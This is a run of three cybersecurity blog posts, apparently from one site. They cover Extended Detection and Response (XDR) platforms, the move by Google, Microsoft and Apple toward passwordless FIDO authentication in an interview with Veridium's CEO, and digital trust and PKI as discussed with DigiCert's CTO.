All security technologies have their own alerting systems, requirements for patches and updates, integration needs, user nuances, policy management processes, access control, reporting, etc. This can become overwhelming for security teams, often understaffed and under-resourced, resulting in missed alerts – some insignificant but critical.

Too many tools, too little time

So, how best to overcome this challenge? As organizations’ environments continue expanding, how best to improve security across the entire infrastructure without creating vendor sprawl or overburdening security teams?

One tool picking up prominence is Extended Detection and Response (XDR.)

XDR is one of the latest acronyms to hit the cyber dictionary, and it is a new approach to threat detection and response. It provides holistic protection against cyberattacks across an organization’s entire digital estate, including endpoints, applications, networks, and cloud environments.

While the tool is often confused with Managed Detection and Response (MDR), Security Information and Event Management (SIEM), and Endpoint Detection and Response (EDR), it is very different as it builds upon each offering, rolling them into a single package to help organizations better secure their environments as digital transformation accelerates.

While EDR, MDR, and SIEM provide visibility into specific areas, by choosing just one, organizations are not necessarily improving their overall security posture against potential attack vectors because visibility is still limited to only the area that the solution is monitoring.

With EDR, the solution only looks for threats or security issues impacting organizations’ endpoints. Historically, when organizations’ primary attack vectors were PCs, this would have provided adequate security. However, attacks target multiple different sources today, so threat hunting and protection must secure everything.

XDR meets evolving security needs

Rather than deploying multiple tools from multiple security vendors, XDR combines endpoint, network, applications, and cloud architecture monitoring and response capabilities into one platform, allowing better correlation of security events and freeing security teams from vendor sprawl. With cyberattacks growing year-on-year, organizations simply do not have the manpower or resources to combat threats.

To bridge the gap, holes are plugged with new security products. While these are beneficial in threat detection, most products are from different vendors, which means there is no unified way to receive alerts. This results in strained security teams wasting time navigating through the mechanics of each security tool.

One of the best ways to overcome this issue is through XDR technology, the next evolution in threat detection and response. XDR’s capabilities protect organizations’ entire digital estates as they grow beyond the safety of its perimeter.

XDR can replace multiple toolsets and alerting systems into single, integrated solutions and provide rapid response against threats targeting all organizational infrastructure. Security teams can then identify and investigate alerts quickly from a single source without overburdening them before threats can harm businesses.

About the essayist: Christian Espinosa is the managing director of Cerberus Sentinel a Managed Compliance and Cybersecurity Provider (MCCP) with its exclusive MCCP+ managed compliance and cybersecurity services plus culture program. He also is the best-selling author of “The Smartest Person in the Room.”  Espinosa came to Cerberus Sentinel after the company acquired Alpine Security, a cybersecurity consulting and managed services company he founded. He also has been a white hat hacker and a certified high-performance coach.  

Google, Microsoft and Apple are bitter arch-rivals who don’t often see eye-to-eye.

Related: Microsoft advocates regulation of facial recognition tools

Yet, the tech titans recently agreed to adopt a common set of standards supporting passwordless access to websites and apps.

This is one giant leap towards getting rid of passwords entirely. Perhaps not coincidently, it comes at a time when enterprises have begun adopting passwordless authentication systems in mission-critical parts of their internal operations.

Excising passwords as the security linchpin to digital services is long, long overdue. It may take a while longer to jettison them completely, but now there truly is a light at the end of the tunnel.

I recently sat down with Ismet Geri, CEO of Veridium, to discuss what the passwordless world we’re moving towards might be like. For a full drill down on our wide-ranging discussion, please give a listen to the accompanying podcast. Here are a few takeaways.

Security + efficiency

Passwordless technology is certainly ready for prime time; innovative solutions from suppliers like Cisco’s Duo, Hypr, OneLogin and Veridium have been steadily gaining traction in corporate settings for the past few years.

And the pace of adoption is quickening, Geri told me. Companies in the throes of digital transformation, and especially post Covid19, have never been more motivated to adapt a new authentication paradigm – one that eliminates shared secrets.

Password abuse at scale arose shortly after the decision got made in the 1990s to make shared secrets the basis for securing digital connections. Fortifications, such as multi-factor authentication (MFA) and password managers, proved to be mere speed bumps. Threat actors now routinely bypass these second-layer security gates.

No small part of the problem is that passwords and MFA require a significant amount of human interaction. “Relying on shared secrets doesn’t work anymore, because we have too many accounts and no one can remember hundreds of passwords.” Geri says. “Our brains just won’t do it.”

As companies accelerate their dependence on hosted cloud services, the clunkiness of passwords and MFA is exacting a toll on productivity. One bank in the U.S. Northeast, for instance, was concerned about tellers having to type-in their passwords 50 or more times a day. “They wanted to make their tellers’ work life easier, more friendly and seamless, and at the same time improve security,” Geri says.

This was accomplished by using web cameras at each terminal tied into Veridium facial recognition software. Instead of the teller having to type in a username and password, then also use a second-factor of authentication over and over, access now happens silently and swiftly based on who the teller is. Thus, the bank measurably reduced its exposure to password abuse, while also lightening the burden on each teller.

Adoption scenarios

Geri

Outside of the banking industry, which strictly prohibits the use of BYOD smartphones for tellers, many organizations have begun adopting passwordless solutions by leveraging their employees’ personally-owned smartphones. Passwordless access to company resources goes something like this: Instead of a logon prompt asking for a username and password, the employee gets presented with a QR Code.

He or she simply uses his or her smartphone to scan the QR code. A phone app then uses the onboard biometric sensor, either fingerprint or facial, to authenticate the employee to the company’s server. “The most common adoption scenario that we see is companies seeking a passwordless experience across all of their applications,” Geri says.

Talk about turning Bring Your Own Device security concerns on its head. Passwordless solutions now enable companies to turn BYOD into a strategic tool. When you consider how password abuse has grown into a full-blown criminal specialty, it’s easy to measure the security gained from shutting down password abuse vectors.

The efficiency gain comes from reducing logon sprawl; today employees are required to repeatedly type-in a username and password, then also use various forms of MFA to connect to the company network, to log onto cloud-hosted productivity and collaboration tools, as well as to access operational software.

Coming advances

In short, what’s happening is that companies are shifting to passwordless authenticators because they materially improve security, but also leverage tools like a smartphone which is far less likely to be left behind or misplaced.

Google, Microsoft and Apple now get this. After a decade of sitting on the fence, the tech giants on May 5 announced that they would formally adopt standards pulled together by the FIDO Alliance.

FIDO stands for Fast IDentity Online. It’s a fresh set of industry standards, akin to WiFi and Bluetooth, that encourages the development and use of passwordless authenticators. Any device manufacturer, software developer or online service provider can integrate FIDO protocols and policies into their products and services.

Whatever their ulterior motives, Google, Microsoft and Apple should be congratulated for finally seeing the light. They’ve dispatched spokesmen to herald the “eliminating the vulnerability of passwords” and tout “making passwordless part of consumer lives” and “completing the shift to a passwordless world.” Maybe the tech giants finally noticed the train leaving and thought it wise to jump on board.

For its part, Veridium launched in 2016 with a laser focus on designing passwordless systems from scratch that directly addressed the growing frustration of IT department and security team leaders.

Attaining ‘recognition’

Geri told me that Veridium is already three years into development of a major advance – technology that can take into account behavioral biometrics, such as the pattern of hand movement a person habitually uses when using a fingerprint or iris sensor.

By remembering nuances about movements and other behavior traits over time, this technology will make Veridium’s platform swifter and surer about authenticating a user, Geri told me.

“It’s a concept I call recognition,” he says. “Behavior patterns combined with a strong authentication asset, which is your biometrics, could get us very close to starting to recognize you.”

More such advances are coming. How they get used in a global sense remains to be seen.

Will passwordless authenticators serve mainly to tighten the iron grip that the social media giants hold on consumers’ online personas? Or could these advances foster a fresh trend, one that supports a more fair distribution of wealth, say like the mainstreaming of self-sovereign identities? We’re destined to soon find out. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

Modern digital systems simply could not exist without trusted operations, processes and connections. They require integrity, authentication, trusted identity and encryption.

Related: Leveraging PKI to advance electronic signatures

It used to be that trusting the connection between a workstation and a mainframe computer was the main concern. Then the Internet took off and trusting the connection between a user’s device and a web server became of paramount importance.

Today we’re in the throes of digital transformation. Software-defined-everything is the order of the day. Our smart buildings, smart transportation systems and smart online services are all network-connected at multiple levels. Digital services get delivered across a complex amalgam of public cloud, hybrid cloud and on-premises digital systems.

It is against this backdrop that digital trust has become paramount. We simply must attain —  and sustain — a high bar of confidence in the computing devices, software applications and data that make up he interconnected world we occupy.

And yet at this moment, digital trust isn’t where it needs to be on the boardroom priority list or the IT security team’s strategy. It remains all too common for threat actors to subvert connected ecosystems. This challenge has not escaped the global cybersecurity community. Largely out of the public’s eye, technologists from the private and public sectors are fully engaged in shaping the elements of digital trust that will safeguard our connected future.

Protocols and policies setting new parameters for trusted connections are being hammered out and advanced encryption, authentication and data protection solutions are being ramped up.

Failure is not an option. These efforts must result in a level of digital trust significantly higher than we have today if we are to have full confidence in digital services, going forward.

This was the main topic of discussion recently at DigiCert Security Summit 2022. I had the chance to talk about DigiCert’s perspective  with Jason Sabin, DigiCert’s Chief Technology Officer.

We discussed why elevating digital trust has become so vital. Here are a few key takeaways.

Trust under siege

Long gone are the days when a security team mainly had to be concerned about network connections getting made internally, on company-owned equipment, or externally, across a VPN connection or a public-facing webpage.

Today, software developers are king and agile software is their golden chalice. Developers stitch together modular microservices and software containers that tap into far-flung software-defined resources. This results in ephemeral connections firing off at a vast scale — humans-to-software and software-to-software – all across the Internet Cloud.

Trust is under siege. The challenge faced by a security team is to verify the authenticity of each connection and preserve the encryption, as needed, across a massive, sprawling attack surface.

And this is where digital trust comes in, with core implementations such as public key infrastructure (PKI), Sabin noted. PKI is the framework by which digital certificates get issued to authenticate the identity of users and devices; and it is also the plumbing for encrypting data that moves across the public Internet.

Most folks come into contact with the most visible subset of PKI — the TLS/SSL/HTTPS authentication and encryption protocol – each time they connect to a secured website.

However, PKI has engrained itself much more pervasively than that across the digital landscape. Over the past decade or so, companies have turned to using PKI to certify and secure many types of digital connections inside their private networks, as well.

Consider that just five years ago, a large enterprise was typically responsible for managing tens of thousands of digital certificates. Today that number for many organizations is pushing a million or more digital certificates, as digital transformation accelerates.

“There’s a massive shift unfolding very, very quickly,” Sabin told me.  “Trust has become the backbone of security and, as a result, companies are leveraging PKI technology to implement trust in all parts of their ecosystem, which basically comes down to issuing and managing a lot of digital certificates.”

Protocols, policies and PKI

The question then becomes: Is PKI robust enough to support the elevated level of digital trust that’s needed?

DigiCert and other security experts essentially argue that the answer is: PKI is ubiquitous, time tested and well-suited to leveraging automation. It can form a foundation of a larger digital trust strategy.

DigiCert, for instance, supplies advanced PKI management systems that can authenticate the identity of an individual, a business, a machine, a workload, a software container or a microservice. And automation already is being leveraged to assure that an object hasn’t been tampered with, as well as ensure the encryption of data in transit – at scale.

Advanced data security technologies, no matter how terrific, are just one piece of the puzzle. The security experts and thought leaders at DigiCert’s conference discussed the progress being made on a couple of other fronts: protocols and policies.

In order to achieve a level of digital trust needed to support great leaps forward, a fresh set of technical protocols, compliance benchmarks and supporting audits remain to be finalized and implemented.

The model for driving consensus of this sort has been laid out by the industry forums and consortiums that convened to give us the protocols and policies undergirding the public Internet. Many of these same groups remain active, like the CA/Browser Forum, which focuses on benchmarks for digital certificates, are actively hashing out new rules of the road.

Ssabin

“We have to think about how to extend trust to mobile devices and to IoT devices, and how to more effectively protect supply chains and critical infrastructure,” Sabin says. “We also must find ways to encourage high levels of compliance with industry standards and government regulations. This is all part of building trusted digital ecosystems.”

Everyone should realize what’s at stake here: smarter buildings, autonomous transportation systems, climate change remediation, medical breakthroughs.

As people spend larger chunks of their waking hours online, the boundary between personal and work connectivity has become fluid. Companies need come to view digital trust as a strategic imperative.

This challenge speaks to verifying the integrity of homespun and third-party software builds, firmware on connected devices and their trusted access, trustworthiness of documents and much more, Sabin says.

I agree.  And I’m encouraged that the work of prioritizing digital trust is well underway. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)